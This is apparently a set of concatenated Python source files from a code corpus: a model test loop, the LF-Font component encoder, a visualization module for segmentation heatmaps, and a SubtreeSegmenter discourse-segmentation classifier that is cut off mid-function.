if len(sample_shape) == 1 and sample_shape[0] == 1 \
else torch.randn(configs.env.ci.batchsize, *sample_shape)
print("\t-- " + name + " size: ", end="")
print(sample_dict[name].size())
for run_cfg in configs.Run.all():
run_name = os.path.splitext(os.path.split(run_cfg._path)[1])[0]
print('\t\tTesting config: ' + run_name + ' ...')
model = self.model(model_cfg, data_cfg, run_cfg)
params, params_all = dict(), 0
for name, value in model.modules().items():
params[name] = sum(p.numel() for p in value.parameters() if p.requires_grad)
params_all += params[name]
print("\t\t-- parameter(s): ", end="")
print(params)
print("\t\t-- all parameters: ", end="")
print(params_all)
loss_dict = model.train(0, sample_dict)
print("\t\t-- loss(es): ", end="")
print(loss_dict)
result_dict = model.test(0, sample_dict)
for name, value in result_dict.items():
result_dict[name] = value.shape
print("\t\t-- result(s) size: ", end="")
print(result_dict)
print("\t\t-- save folder: ", end="")
print(model.getpath())
save_folder = os.path.join("test", model_name, data_name + '-' + run_name)
model.save(epoch=0, path=save_folder)
model.load(path=save_folder)
print('')
|
the-stack_0_1647 | """
LF-Font
Copyright (c) 2020-present NAVER Corp.
MIT license
"""
from functools import partial
import torch.nn as nn
import torch
from base.modules import ConvBlock, ResBlock, GCBlock, CBAM
class ComponentConditionBlock(nn.Module):
def __init__(self, in_shape, n_comps):
super().__init__()
self.in_shape = in_shape
self.bias = nn.Parameter(torch.zeros(n_comps, in_shape[0], 1, 1), requires_grad=True)
def forward(self, x, comp_id=None):
out = x
if comp_id is not None:
b = self.bias[comp_id]
out += b
return out
class ComponentEncoder(nn.Module):
def __init__(self, n_comps):
super().__init__()
ConvBlk = partial(ConvBlock, norm="in", activ="relu", pad_type="zero")
ResBlk = partial(ResBlock, norm="in", activ="relu", pad_type="zero", scale_var=False)
C = 32
self.layers = nn.ModuleList([
ConvBlk(1, C, 3, 1, 1, norm='none', activ='none'), # 128x128
ConvBlk(C*1, C*2, 3, 1, 1, downsample=True), # 64x64
GCBlock(C*2),
ConvBlk(C*2, C*4, 3, 1, 1, downsample=True), # 32x32
CBAM(C*4),
ComponentConditionBlock((128, 32, 32), n_comps),
ResBlk(C*4, C*4, 3, 1),
CBAM(C*4),
ResBlk(C*4, C*4, 3, 1),
ResBlk(C*4, C*8, 3, 1, downsample=True), # 16x16
CBAM(C*8),
ResBlk(C*8, C*8)
])
self.skip_layer_idx = 8
self.feat_shape = {"last": (C*8, 16, 16), "skip": (C*4, 32, 32)}
def forward(self, x, *comp_id):
x = x.repeat((1, 1, 1, 1))
ret_feats = {}
for lidx, layer in enumerate(self.layers):
if isinstance(layer, ComponentConditionBlock):
x = layer(x, *comp_id)
else:
x = layer(x)
if lidx == self.skip_layer_idx:
ret_feats["skip"] = x
ret_feats["last"] = x
ret_feats = {k: nn.Sigmoid()(v) for k, v in ret_feats.items()}
return ret_feats
def get_feat_shape(self):
return self.feat_shape
|
the-stack_0_1648 | import logging
import math
import re
import warnings
from pathlib import Path
import numpy as np
import torch
import torch.nn.functional as F
from PIL import Image
from matplotlib import pyplot as plt, gridspec, cm, colors
import csv
from utils.utils import unscale, unnormalize, get_key_def
from utils.geoutils import create_new_raster_from_base
import matplotlib
matplotlib.use('Agg')
logging.getLogger(__name__)
def grid_vis(input_, output, heatmaps_dict, label=None, heatmaps=True):
""" Create a grid with PIL images and titles
:param input_: (tensor) input array as pytorch tensor, e.g. as returned by dataloader
:param output: (tensor) output array as pytorch tensor, e.g. as returned by dataloader
:param heatmaps_dict: (dict) Dictionary of heatmaps where key is grayscale value of class and value a dict {'class_name': (str), 'heatmap_PIL': (PIL object))
:param label: (tensor) label array as pytorch tensor, e.g. as returned by dataloader (optional)
:param heatmaps: (bool) if True, include heatmaps in grid
:return: Saves .png to disk
"""
list_imgs_pil = [input_, label, output] if label is not None else [input_, output]
list_titles = ['input', 'label', 'output'] if label is not None else ['input', 'output']
num_tiles = (len(list_imgs_pil) + len(heatmaps_dict))
height = math.ceil(num_tiles/4)
width = num_tiles if num_tiles < 4 else 4
plt.figure(figsize=(width*6, height*6))
grid_spec = gridspec.GridSpec(height, width)
if heatmaps:
for key in heatmaps_dict.keys():
list_imgs_pil.append(heatmaps_dict[key]['heatmap_PIL'])
list_titles.append(heatmaps_dict[key]['class_name'])
assert len(list_imgs_pil) == len(list_titles)
for index, zipped in enumerate(zip(list_imgs_pil, list_titles)):
img, title = zipped
plt.subplot(grid_spec[index])
plt.imshow(img)
plt.grid(False)
plt.axis('off')
plt.title(title)
plt.tight_layout()
return plt
def vis_from_batch(vis_params,
inputs,
outputs,
batch_index,
vis_path,
labels=None,
dataset='',
ep_num=0,
scale=None,
debug=False):
""" Provide indiviual input, output and label from batch to visualization function
:param vis_params: (Dict) parameters useful during visualization
:param inputs: (tensor) inputs as pytorch tensors with dimensions (batch_size, channels, width, height)
:param outputs: (tensor) outputs as pytorch tensors with dimensions (batch_size, channels, width, height)
:param batch_index: (int) index of batch inside epoch
:param vis_path: path where visualisation images will be saved
:param labels: (tensor) labels as pytorch tensors with dimensions (batch_size, channels, width, height)
:param dataset: name of dataset for file naming purposes (ex. 'tst')
:param ep_num: (int) number of epoch for file naming purposes
:param debug: (bool) if True, some debug features will be activated
:return:
"""
labels = [None]*(len(outputs)) if labels is None else labels # Creaty empty list of labels to enable zip operation below if no label
for batch_samp_index, zipped in enumerate(zip(inputs, labels, outputs)):
epoch_samp_index = batch_samp_index + len(inputs) * batch_index
input_, label, output = zipped
vis(vis_params, input_, output,
vis_path=vis_path,
sample_num=epoch_samp_index+1,
label=label,
dataset=dataset,
ep_num=ep_num,
scale=scale,
debug=debug)
def vis(vis_params,
input_,
output,
vis_path,
sample_num=0,
label=None,
dataset='',
ep_num=0,
inference_input_path=None,
scale=None,
debug=False):
"""saves input, output and label (if given) as .png in a grid or as individual pngs
:param input_: (tensor) input array as pytorch tensor, e.g. as returned by dataloader
:param output: (tensor) output array as pytorch tensor before argmax, e.g. as returned by dataloader
:param vis_path: path where visualisation images will be saved
:param sample_num: index of sample if function is from for loop iterating through a batch or list of images.
:param label: (tensor) label array as pytorch tensor, e.g. as returned by dataloader. Optional.
:param dataset: (str) name of dataset arrays belong to. For file-naming purposes only.
:param ep_num: (int) number of epoch arrays are inputted from. For file-naming purposes only.
:param inference_input_path: (Path) path to input image on which inference is being performed. If given, turns «inference» bool to True below.
:return: saves color images from input arrays as grid or as full scale .png
"""
# TODO: Temporary fix, need to be discuss, `input_` is a list if the initial input as NIR with the RGB at [0].
# The `squeeze` fonction cut the useless dimension, append in inference.
input_ = np.squeeze(input_[0]) if type(input_) is list else np.squeeze(input_)
assert vis_path.parent.is_dir()
vis_path.mkdir(exist_ok=True)
single_class_mode = False
if not vis_params[
'inference_input_path']: # FIXME: function parameters should not come in as different types if inference or not.
input_ = input_.cpu().permute(1, 2, 0).numpy() # channels last
if output.shape[0] == 1:
output = torch.sigmoid(output) # use sigmoid for single class
single_class_mode = True
else:
output = F.softmax(output, dim=0) # use softmax for multiclass (note: not applied for inference)
output = output.detach().cpu().permute(1, 2, 0).numpy() # channels last
if label is not None:
label_copy = label.cpu().numpy().copy()
if vis_params['ignore_index'] < 0:
new_ignore_index = 255
# Convert all pixels with ignore_index values to 255 to make sure it is last in order of values.
label_copy[label_copy == vis_params['ignore_index']] = new_ignore_index
if vis_params['mean'] and vis_params['std']:
input_ = unnormalize(input_img=input_, mean=vis_params['mean'], std=vis_params['std'])
input_ = unscale(img=input_, float_range=(scale[0], scale[1]), orig_range=(0, 255)) if scale else input_
mode = 'RGB' # https://pillow.readthedocs.io/en/3.1.x/handbook/concepts.html#concept-modes
if 1 <= input_.shape[2] <= 2:
input_ = np.squeeze(input_[:, :, :1], axis=2) # take first band (will become grayscale image)
mode = 'L'
elif input_.shape[2] >= 3:
input_ = input_[:, :, :3] # take three first bands assuming they are RGB in correct order
input_PIL = Image.fromarray(input_.astype(np.uint8), mode=mode) # TODO: test this with grayscale input.
# Give value of class to band with highest value in final inference
if single_class_mode:
output_acv = np.squeeze(output, axis=2).astype(np.uint8)
else:
output_acv = np.argmax(output, axis=2).astype(np.uint8) # Flatten along channels axis. Convert to 8bit
# Define colormap and names of classes with respect to grayscale values
classes, cmap = colormap_reader(output, vis_params['colormap_file'], default_colormap='Set1')
heatmaps_dict = heatmaps_to_dict(output, classes, inference=inference_input_path,
debug=debug) # Prepare heatmaps from softmax output
# Convert output and label, if provided, to RGB with matplotlib's colormap object
output_acv_color = cmap(output_acv)
output_acv_PIL = Image.fromarray((output_acv_color[:, :, :3] * 255).astype(np.uint8), mode='RGB')
if not inference_input_path and label is not None:
label_color = cmap(label_copy)
label_PIL = Image.fromarray((label_color[:, :, :3] * 255).astype(np.uint8), mode='RGB')
else:
label_PIL = None
if inference_input_path is not None:
if debug and len(np.unique(output_acv)) == 1:
warnings.warn(f'Inference contains only {np.unique(output_acv)} value. Make sure data scale '
f'{scale} is identical with scale used for training model.')
output_name = vis_path.joinpath(f"{inference_input_path.stem}_inference.tif")
create_new_raster_from_base(inference_input_path, output_name, output_acv)
if vis_params['heatmaps_inf']:
for key in heatmaps_dict.keys():
heatmap = np.array(heatmaps_dict[key]['heatmap_PIL'])
class_name = heatmaps_dict[key]['class_name']
heatmap_name = vis_path.joinpath(f"{inference_input_path.stem}_inference_heatmap_{class_name}.tif")
create_new_raster_from_base(inference_input_path, heatmap_name, heatmap)
elif vis_params['grid']: # SAVE PIL IMAGES AS GRID
grid = grid_vis(input_PIL, output_acv_PIL, heatmaps_dict, label=label_PIL, heatmaps=vis_params['heatmaps'])
grid.savefig(vis_path.joinpath(f'{dataset}_{sample_num:03d}_ep{ep_num:03d}.png'))
plt.close()
else: # SAVE PIL IMAGES DIRECTLY TO FILE
if not vis_path.joinpath(f'{dataset}_{sample_num:03d}_satimg.jpg').is_file():
input_PIL.save(vis_path.joinpath(f'{dataset}_{sample_num:03d}_satimg.jpg'))
if not inference_input_path and label is not None:
label_PIL.save(vis_path.joinpath(f'{dataset}_{sample_num:03d}_label.png')) # save label
output_acv_PIL.save(vis_path.joinpath(f'{dataset}_{sample_num:03d}_output_ep{ep_num:03d}.png'))
if vis_params['heatmaps']: # TODO: test this.
for key in heatmaps_dict.keys():
heatmap = heatmaps_dict[key]['heatmap_PIL']
class_name = heatmaps_dict[key]['class_name']
heatmap.save(vis_path.joinpath(f"{dataset}_{sample_num:03d}_output_ep{ep_num:03d}_heatmap_{class_name}.png")) # save heatmap
def heatmaps_to_dict(output, classes=[], inference=False, debug=False):
''' Store heatmap into a dictionary
:param output: softmax tensor
:return: dictionary where key is value of class and value is numpy array
'''
heatmaps_dict = {}
classes = range(output.shape[2]) if len(classes) == 0 else classes
for i in range(output.shape[2]): # for each channel (i.e. class) in output
perclass_output = output[:, :, i]
if inference: # Don't color heatmap if in inference
if debug:
logging.info(f'Heatmap class: {classes[i]}\n')
logging.info(f'List of unique values in heatmap: {np.unique(np.uint8(perclass_output * 255))}\n')
perclass_output_PIL = Image.fromarray(np.uint8(perclass_output*255))
else: # https://stackoverflow.com/questions/10965417/how-to-convert-numpy-array-to-pil-image-applying-matplotlib-colormap
perclass_output_PIL = Image.fromarray(np.uint8(cm.get_cmap('inferno')(perclass_output) * 255))
heatmaps_dict[i] = {'class_name': classes[i], 'heatmap_PIL': perclass_output_PIL}
return heatmaps_dict
def colormap_reader(output, colormap_path=None, default_colormap='Set1'):
"""
:param colormap_path: csv file (with header) containing 3 columns (input grayscale value, classes, html colors (#RRGGBB))
:return: list of classes and list of html colors to map to grayscale values associated with classes
"""
if colormap_path is not None:
assert Path(colormap_path).is_file(), f'Could not locate {colormap_path}'
input_val = []
classes_list = ['background']
html_colors = ['#000000']
with open(colormap_path, 'rt') as file:
reader = csv.reader(file)
next(reader) # Skip header
rows = list(reader)
input_val.extend([int(row[0]) for row in rows])
csv_classes = [row[1] for row in rows] # Take second element in row. Should be class name
csv_html_colors = [row[2] for row in rows] # Take third element in row. Should be hex color code
sorted_classes = [x for _, x in sorted(zip(input_val, csv_classes))] # sort according to grayscale values order
sorted_colors = [x for _, x in sorted(zip(input_val, csv_html_colors))]
for color in sorted_colors:
match = re.search(r'^#(?:[0-9a-fA-F]{3}){1,2}$', color)
assert match, f'Submitted color {color} does not match HEX color code pattern'
classes_list.extend(sorted_classes)
html_colors.extend(sorted_colors)
assert len(html_colors) == len(classes_list) >= output.shape[2], f'Not enough colors and class names for number of classes in output'
html_colors.append('white') # for ignore_index values in labels. #TODO: test this with a label containt ignore_index values
cmap = colors.ListedColormap(html_colors)
else:
classes_list = list(range(0, output.shape[2])) # TODO: since list of classes are only useful for naming each heatmap, this list could be inside the heatmaps_dict, e.g. {1: {heatmap: perclass_output_PIL, class_name: 'roads'}, ...}
cmap = cm.get_cmap(default_colormap)
return classes_list, cmap
|
the-stack_0_1650 | """
SubtreeSegmenter.py
A discourse unit segmentation module based on a moving window capturing parts of
a dependency syntax parse.
"""
import io, sys, os, copy
# Allow package level imports in module
script_dir = os.path.dirname(os.path.realpath(__file__))
lib = os.path.abspath(script_dir + os.sep + "..")
models = os.path.abspath(script_dir + os.sep + ".."+os.sep+".."+os.sep + "models")
sys.path.append(lib)
from collections import defaultdict, Counter
from argparse import ArgumentParser
#os.environ['OMP_NUM_THREADS'] = "1"
import numpy as np
import pandas as pd
from sklearn.ensemble import ExtraTreesClassifier, RandomForestClassifier, GradientBoostingClassifier
from sklearn.externals import joblib
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import GridSearchCV
from xgboost import XGBClassifier
from conll_reader import read_conll, get_multitrain_preds
from tune import permutation_importances, report_correlations, report_theils_u, get_best_params, get_best_score, hyper_optimize, grid_search
np.random.seed(42)
import random
random.seed(42)
DEFAULTCLF = RandomForestClassifier(random_state=42)
DEFAULTCLF = XGBClassifier(random_state=42, max_depth=50, min_child_weight=1, n_estimators=200, n_jobs=3 , verbose=1,learning_rate=0.16)
DEFAULTPARAMS = {"n_estimators":250,"min_samples_leaf":3,"max_features":10,"random_state":42}
class SubtreeSegmenter:
def __init__(self,lang="eng",model=None,multifolds=5,auto=""):
self.name = "SubtreeSegmenter"
self.genre_pat = "^(..)" # By default 2 first chars of docname identify genre
if "gum" in model:
self.genre_pat = "GUM_([^_]+)_"
self.lang = lang
self.multifolds = multifolds
self.corpus = model
self.auto = auto
if model is not None:
self.model = models + os.sep + model + auto + "_subtreeseg.pkl"
else:
self.model = ".." + os.sep + ".." + os.sep + "models" + os.sep + auto + "subtreeseg.pkl"
self.corpus_dir = None
self.clf = DEFAULTCLF
def read_data(self,infile,size,as_text,rare_thresh,chosen_feats=None):
cap = 3*size if size is not None else None
train_feats, vocab, toks, firsts, lasts = read_conll(infile,genre_pat=self.genre_pat,mode="seg",cap=cap,char_bytes=self.lang=="zho",as_text=as_text)
vocab = Counter(vocab)
top_n_words = vocab.most_common(rare_thresh)
top_n_words, _ = zip(*top_n_words)
for tok in train_feats:
if tok["word"] not in top_n_words:
tok["word"] = tok["pos"]
tokens_by_abs_id = self.traverse_trees(train_feats)
data, headers = self.n_gram(train_feats,tokens_by_abs_id)
# Features to use for all n-gram tokens
num_labels = ["head_dist","left_span","right_span","samepar_left","tok_len"]
cat_labels = ["case","closest_left","closest_right","deprel","farthest_left","farthest_right","pos","word","morph","cpos","depchunk"]
pref_cat = []
pref_num = []
for pref in ["mn2","mn1","par","par_par","pl1","pl2"]:
pref_cat += [pref + "_" + h for h in cat_labels]
pref_num += [pref + "_" + h for h in num_labels]
# Features only needed for node token
cat_labels += ["genre"] + pref_cat #+ ["heading_first","heading_last"]#+ ["s_type"]
num_labels += ["dist2end","sent_doc_percentile","tok_id","wid","quote","rank"] + pref_num # + ["bracket"]
num_labels += ["par_quote","par_par_quote"]#,"par_bracket","par_par_bracket"]
# Use specific feature subset
if chosen_feats is not None:
new_cat = []
new_num = []
for feat in chosen_feats:
if feat in cat_labels:
new_cat.append(feat)
elif feat in num_labels:
new_num.append(feat)
cat_labels = new_cat
num_labels = new_num
data = pd.DataFrame(data, columns=headers)
data_encoded, multicol_dict = self.multicol_fit_transform(data, pd.Index(cat_labels))
data_x = data_encoded[cat_labels+num_labels].values
data_y = np.where(data_encoded['label'] == "_", 0, 1)
return data_encoded, data_x, data_y, cat_labels, num_labels, multicol_dict, firsts, lasts, top_n_words
def train(self,training_file,rare_thresh=200,clf_params=None,chosen_feats=None,tune_mode=None,size=None,as_text=True,multitrain=False,chosen_clf=DEFAULTCLF):
"""
:param training_file:
:param rare_thresh:
:param clf_params:
:param chosen_feats: List of feature names to force a subset of selected features to be used
:param tune_mode: None for no grid search, "paramwise" to tune each hyperparameter separately, or "full" for complete grid (best but slowest)
:param size: Sample size to optimize variable importance with
:return:
"""
if tune_mode is not None and size is None:
size = 5000
sys.stderr.write("o No sample size set - setting size to 5000\n")
if clf_params is None:
# Default classifier parameters
clf_params = {"n_estimators":150,"min_samples_leaf":3, "random_state":42}
if DEFAULTCLF.__class__.__name__ not in ["GradientBoostingClassifier","CatBoostClassifier","XGBClassifier"]:
clf_params.update({"n_jobs":4, "oob_score":True, "bootstrap":True})
data_encoded, data_x, data_y, cat_labels, num_labels, multicol_dict, firsts, lasts, top_n_words = self.read_data(training_file,size,as_text=as_text,rare_thresh=rare_thresh,chosen_feats=chosen_feats)
sys.stderr.write("o Learning...\n")
if tune_mode is not None:
# Randomly select |size| samples for training and leave rest for validation, max |size| samples
data_x = data_encoded[cat_labels+num_labels+["label"]].sample(frac=1,random_state=42)
data_y = np.where(data_x['label'] == "_", 0, 1)
data_x = data_x[cat_labels+num_labels]
if len(data_y) > 2*size:
val_x = data_x[size:2*size]
val_y = data_y[size:2*size]
else:
val_x = data_x[size:]
val_y = data_y[size:]
data_x = data_x[:size]
data_y = data_y[:size]
if tune_mode == "importances":
sys.stderr.write("o Measuring correlation of categorical variables\n")
theil_implications = report_theils_u(val_x,cat_labels)
for (var1, var2) in theil_implications:
if var1 in cat_labels and var2 in cat_labels and var2 !="word":
drop_var = var2
u = theil_implications[(var1, var2)]
sys.stderr.write("o Removed feature " + drop_var + " due to Theil's U " + str(u)[:6] + " of " + var1 + "->" + var2 + "\n")
cat_labels.remove(drop_var)
sys.stderr.write("o Measuring correlation of numerical variables\n")
cor_mat = report_correlations(val_x[num_labels],thresh=0.95)
for (var1, var2) in cor_mat:
if var1 in num_labels and var2 in num_labels:
drop_var = var2 # if imp[var1] > imp[var2] else var1
if drop_var == "word":
continue
corr_level = cor_mat[(var1, var2)]
sys.stderr.write("o Removed feature " + drop_var + " due to correlation " + str(corr_level) + " of " + var1 + ":" + var2 + "\n")
num_labels.remove(drop_var)
return cat_labels, num_labels
if tune_mode in ["paramwise","full"]: # Grid Search
best_clf, best_params = grid_search(data_x,data_y,tune_mode,clf_params)
clf_name = best_clf.__class__.__name__
self.clf = best_clf
return best_clf, best_params
elif tune_mode == "hyperopt": # TPE guided random search
from hyperopt import hp
from hyperopt.pyll.base import scope
val_x, val_y = None, None
if self.corpus_dir is not None:
dev_file = self.corpus_dir + os.sep + self.corpus + "_dev.conll"
_, val_x, val_y, _, _, _, _, _, _ = self.read_data(dev_file,size,as_text=False,rare_thresh=rare_thresh,chosen_feats=chosen_feats)
space = {
'n_estimators': scope.int(hp.quniform('n_estimators', 100, 250, 10)),
'max_depth': scope.int(hp.quniform('max_depth', 3, 30, 1)),
'eta': scope.float(hp.quniform('eta', 0.01, 0.2, 0.01)),
'gamma': scope.float(hp.quniform('gamma', 0.01, 0.2, 0.01)),
'colsample_bytree': hp.choice('colsample_bytree', [0.4,0.5,0.6,0.7,1.0]),
'subsample': hp.choice('subsample', [0.5,0.6,0.7,0.8,1.0]),
'clf': hp.choice('clf', ["xgb"])
}
best_clf, best_params = hyper_optimize(data_x.values,data_y,val_x=None,val_y=None,space=space,max_evals=20)
return best_clf, best_params
else: # No hyperparameter optimization
clf = chosen_clf if chosen_clf is not None else DEFAULTCLF
sys.stderr.write("o Setting params " + str(clf_params) + "\n")
clf.set_params(**clf_params)
if clf.__class__.__name__ not in ["GradientBoostingClassifier","CatBoostClassifier","XGBClassifier"]:
clf.set_params(**{"n_jobs":3,"oob_score":True,"bootstrap":True})
if clf.__class__.__name__ in ["XGBClassifier"]:
clf.set_params(**{"n_jobs":3})
clf.set_params(**{"random_state":42})
if multitrain:
multitrain_preds = get_multitrain_preds(clf,data_x,data_y,self.multifolds)
multitrain_preds = "\n".join(multitrain_preds.strip().split("\n")[1:-1]) # Remove OOV tokens at start and end
with io.open(script_dir + os.sep + "multitrain" + os.sep + self.name + self.auto + '_' + self.corpus,'w',newline="\n") as f:
sys.stderr.write("o Serializing multitraining predictions\n")
f.write(multitrain_preds)
if clf.__class__.__name__ == "CatBoostClassifier":
clf.fit(data_x,data_y,cat_features=list(range(len(cat_labels))))
else:
clf.fit(data_x,data_y)
self.clf = clf
feature_names = cat_labels + num_labels
sys.stderr.write("o Using " + str(len(feature_names)) + " features\n")
zipped = zip(feature_names, clf.feature_importances_)
sorted_zip = sorted(zipped, key=lambda x: x[1], reverse=True)
sys.stderr.write("o Feature Gini importances:\n\n")
for name, importance in sorted_zip:
sys.stderr.write(name + "=" + str(importance) + "\n")
if self.clf.__class__.__name__ not in ["GradientBoostingClassifier","CatBoostClassifier","XGBClassifier"]:
sys.stderr.write("\no OOB score: " + str(clf.oob_score_)+"\n\n")
if tune_mode=="permutation":
# Filter features based on permutation importance score threshold
imp = permutation_importances(clf,val_x,val_y)
for var, score in imp.items():
if score < 0 and var != "word":
sys.stderr.write("o Dropping feature " + var + " due to low permutation importance of " + str(score) + "\n")
if var in cat_labels:
cat_labels.remove(var)
elif var in num_labels:
num_labels.remove(var)
sys.stderr.write("o Measuring correlation of numerical variables\n")
cor_mat = report_correlations(val_x[num_labels])
for (var1, var2) in cor_mat:
if var1 in num_labels and var2 in num_labels:
drop_var = var2 if imp[var1] > imp[var2] else var1
if drop_var == "word":
continue
corr_level = cor_mat[(var1, var2)]
sys.stderr.write("o Removed feature " + drop_var + " due to correlation " + str(corr_level) + " of " + var1 + ":" + var2 + "\n")
num_labels.remove(drop_var)
return cat_labels, num_labels
sys.stderr.write("\no Serializing model...\n")
joblib.dump((clf, num_labels, cat_labels, multicol_dict, top_n_words, firsts, lasts), self.model, compress=3)
def predict_cached(self,train=None):
pairs = io.open(script_dir + os.sep + "multitrain" + os.sep + self.name + self.auto + '_' + self.corpus).read().split("\n")
preds = [(int(pr.split()[0]), float(pr.split()[1])) for pr in pairs if "\t" in pr]
return preds
def predict(self, infile, eval_gold=False, as_text=True):
"""
Predict sentence splits using an existing model
:param infile: File in DISRPT shared task *.tok or *.conll format (sentence breaks will be ignored in .conll)
:param eval_gold: Whether to score the prediction; only applicable if using a gold .conll file as input
:param genre_pat: A regex pattern identifying the document genre from document name comments
:param as_text: Boolean, whether the input is a string, rather than a file name to read
:return: tokenwise binary prediction vector if eval_gold is False, otherwise prints evaluation metrics and diff to gold
"""
if self.model is None: # Try default model location
model_path = ".." + os.sep + ".." + os.sep + "models" + os.sep + "subtreeseg.pkl"
else:
model_path = self.model
clf, num_labels, cat_labels, multicol_dict, top_n_words, firsts, lasts = joblib.load(model_path)
feats, _, toks, _, _ = read_conll(infile,genre_pat=self.genre_pat,mode="seg",as_text=as_text,char_bytes=self.lang=="zho")
tokens_by_abs_id = self.traverse_trees(feats)
feats, headers = self.n_gram(feats,tokens_by_abs_id,dummies=False)
temp = []
headers_with_oov = ["first","last","deprel","closest_left","closest_right","farthest_left","farthest_right",
"pos","cpos","morph","s_type","depchunk"]
for pref in ["mn2","mn1","par","par_par","pl1","pl2"]:
temp += [pref + "_" + h for h in headers_with_oov]
headers_with_oov += temp
genre_warning = False
for i, header in enumerate(headers):
if header in headers_with_oov and header in cat_labels:
for item in feats:
if item[i] not in multicol_dict["encoder_dict"][header].classes_:
item[i] = "_"
elif header == "genre" and "genre" in cat_labels:
for item in feats:
if item[i] not in multicol_dict["encoder_dict"]["genre"].classes_: # New genre not in training data
if not genre_warning:
sys.stderr.write("! WARN: Genre not in training data: " + item[i] + "; suppressing further warnings\n")
genre_warning = True
item[i] = "_"
elif header.endswith("word") and header in cat_labels:
for item in feats:
# Replace rare words and words never seen before in this position with POS
if item[i] not in top_n_words or item[i] not in multicol_dict["encoder_dict"][header].classes_:
pos_col = headers.index(header.replace("word","pos"))
if item[pos_col] in multicol_dict["encoder_dict"][header].classes_:
item[i] = item[pos_col]
else:
item[i] = "_"
data = feats
data = pd.DataFrame(data, columns=headers)
data_encoded = self.multicol_transform(data,columns=multicol_dict["columns"],all_encoders_=multicol_dict["all_encoders_"])
data_x = data_encoded[cat_labels+num_labels].values
probas = clf.predict_proba(data_x)
probas = [p[1] for p in probas]
preds = [int(p>0.5) for p in probas]
for i, p in enumerate(preds):
if data["tok_id"].values[i] == 1: # Ensure tok_id 1 is always a segment start
preds[i] = 1
if eval_gold:
gold = np.where(data_encoded['label'] == "_", 0, 1)
conf_mat = confusion_matrix(gold, preds)
sys.stderr.write(str(conf_mat) + "\n")
true_positive = conf_mat[1][1]
false_positive = conf_mat[0][1]
false_negative = conf_mat[1][0]
prec = true_positive / (true_positive + false_positive)
rec = true_positive / (true_positive + false_negative)
f1 = 2*prec*rec/(prec+rec)
sys.stderr.write("P: " + str(prec) + "\n")
sys.stderr.write("R: " + str(rec) + "\n")
sys.stderr.write("F1: " + str(f1) + "\n")
with io.open("diff.tab",'w',encoding="utf8") as f:
for i in range(len(gold)):
f.write("\t".join([toks[i],str(gold[i]),str(preds[i])])+"\n")
return conf_mat, prec, rec, f1
else:
return zip(preds,probas)
def optimize(self, train, rare_thresh=200, size=5000, tune_mode="paramwise",as_text=False, cached_params=False):
# Estimate useful features on a random sample of |size| instances
selected_cat, selected_num = self.train(train,rare_thresh=rare_thresh,tune_mode="importances",size=size,as_text=as_text)
selected_feats = selected_cat + selected_num
with io.open(script_dir + os.sep + "SubtreeSegmenter_best_params"+self.auto+".tab",'a',encoding="utf8") as bp:
bp.write(self.corpus + "\t"+self.clf.__class__.__name__+"\tfeatures\t" + ",".join(selected_feats)+"\n")
sys.stderr.write("o Chose "+str(len(selected_feats))+" features: " + ",".join(selected_feats)+"\n")
if tune_mode != "features":
sys.stderr.write("o Tuning hyperparameters\n\n")
# Optimize hyperparameters via grid search
if cached_params:
best_clf, best_params, _ = get_best_params(self.corpus, self.name)
sys.stderr.write("\no Using cached best hyperparameters\n")
elif tune_mode!="features":
best_clf, best_params = self.train(train,rare_thresh=rare_thresh,tune_mode=tune_mode,size=200000,as_text=as_text, chosen_feats=selected_feats)
sys.stderr.write("\no Found best hyperparameters\n")
else:
best_clf = DEFAULTCLF
best_params = DEFAULTPARAMS
sys.stderr.write("\no Using default hyperparameters\n")
for key, val in best_params.items():
sys.stderr.write(key + "\t" + str(val) + "\n")
sys.stderr.write(best_clf.__class__.__name__ + "\n")
sys.stderr.write("\n")
return best_clf, selected_feats, best_params
@staticmethod
def traverse_trees(tokens):
tokens_by_abs_id = {}
def get_descendants(parent_id, children_dict, seen_tokens):
# Helper function to recursively collect children of children
my_descendants = []
my_descendants += children_dict[parent_id]
for child in children_dict[parent_id]:
if child["abs_id"] in seen_tokens:
sys.stderr.write("\nCycle detected in syntax tree in sentence " + str(child["s_id"])+" token: "+child["word"]+"\n")
sys.exit("Exiting due to invalid input\n")
else:
seen_tokens.add(child["abs_id"])
for child in children_dict[parent_id]:
child_id = child["abs_id"]
if child_id in children_dict:
my_descendants += get_descendants(child_id, children_dict, seen_tokens)
return my_descendants
def get_rank(tok, token_dict, rank=0):
# Helper function to determine tokens' graph depth
if tok["abs_parent"].endswith("_0"):
return rank
else:
rank+=1
return get_rank(token_dict[tok["abs_parent"]],token_dict,rank=rank)
# Make unique ids
for tok in tokens:
tok["abs_id"] = str(tok["s_id"]) + "_" + str(tok["wid"])
tok["abs_parent"] = str(tok["s_id"]) + "_" + str(tok["head"])
tok["descendants"] = [] # Initialize descendant list
tokens_by_abs_id[str(tok["s_id"]) + "_" + str(tok["wid"])] = tok
# Add dist2end feature (=reverse id)
for tok in tokens:
tok["dist2end"] = tok["s_len"]-tok["wid"]
# Make children dict
children = defaultdict(list)
for tok in tokens:
if not tok["abs_parent"].endswith("_0"):
children[tok["abs_parent"]].append(tok)
# Recursively get descendants
for parent_id in children:
seen_tokens = set()
parent = tokens_by_abs_id[parent_id]
parent["descendants"] = get_descendants(parent_id, children, seen_tokens)
# Compute graph rank for each token
for tok in tokens:
tok["rank"] = get_rank(tok, tokens_by_abs_id, 0)
# Use descendant dictionary to find closest/farthest left/right children's network
for tok in tokens:
tok["farthest_left"] = tok
tok["farthest_right"] = tok
tok["closest_right"] = tok
tok["closest_left"] = tok
tok["right_span"] = 0
tok["left_span"] = 0
d_list = sorted(tok["descendants"],key=lambda x: x["tok_id"])
for d in d_list:
d_id = d["tok_id"]
t_id = tok["tok_id"]
if d_id < t_id: # Left child
if d_id < int(tok["farthest_left"]["tok_id"]):
tok["farthest_left"] = d
# tok["left_span"] = self.bin_numbers(tok["left_span"] ,bin_splits=[-6,-3,-1,0,1,2,4,7])
tok["left_span"] = int(tok["tok_id"]) - int(d["tok_id"])
if (d_id > int(tok["closest_left"]["tok_id"]) and d_id < tok["tok_id"]) or (d_id < tok["tok_id"] and tok["closest_left"] == tok):
tok["closest_left"] = d
else: # Right child
if d_id > int(tok["farthest_right"]["tok_id"]):
tok["farthest_right"] = d
tok["right_span"] = int(d["tok_id"]) - int(tok["tok_id"])
if (d_id < tok["closest_right"]["tok_id"] and d_id > tok["tok_id"]) or (d_id > tok["tok_id"] and tok["closest_right"] == tok):
tok["closest_right"] = d
# Represent child network as deprels
for prop in ["closest_right","closest_left","farthest_right","farthest_left"]:
if tok[prop] == tok:
